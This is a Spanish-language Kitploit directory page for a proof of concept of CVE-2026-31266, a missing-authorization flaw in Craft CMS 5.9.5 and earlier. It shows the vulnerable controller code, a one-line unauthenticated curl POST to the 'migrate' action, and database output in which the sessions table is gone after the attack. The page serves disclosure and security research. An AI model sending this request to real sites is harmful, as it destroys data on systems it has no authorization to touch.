Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Craftcms-PoC-CVE-2026-31266 — Investigación de seguridad sobre el mecanismo de autenticación de Craft CMS | Kitploit
Herramientas/GitHubGitHub/0xrixet/craftcms-poc-cve-2026-31266
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticación
GitHub0xrixet/craftcms-poc-cve-2026-31266

Craftcms-PoC-CVE-2026-31266

Investigación de seguridad sobre el mecanismo de autenticación de Craft CMS

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
3hace 3 mesesAún no revisado

CVE-2026-31266 - Craft CMS Falta de Autorización

Información del CVE

CampoValor
CVE IDCVE-2026-31266
ProveedorPixel & Tonic
ProductoCraft CMS
Versiones Afectadas<= 5.9.5
CWECWE-862 (Falta de Autorización)
CVSS7.3 (Alta)
Investigador de Seguridad0xRIXET

Contenido de la Evidencia

  • screenshots/ - Demostraciones de Prueba de Concepto

Vulnerabilidad

  • Tipo: Falta de Autorización
  • Impacto: Bypass de Autenticación
  • Proveedor: Craft CMS
  • Estado: CVE-2026-31266

Código Vulnerable

Archivo: src/controllers/AppController.php

Líneas 65-68:

root@kitploit:~
protected array|bool|int $allowAnonymous = [
    'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];

Prueba de Concepto

root@kitploit:~
# With allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"

Evidencia

Antes del Ataque:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+

Después del Ataque:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist

Referencias

  • Repositorio de Craft CMS
  • Documentación de Seguridad de Craft CMS
  • Entrada NVD

Contacto

  • Investigador de Seguridad: 0xRIXET | Mohammed Al-shehri
  • Twitter | X : @0xRIXET
  • Email: [email protected]
Descargar herramienta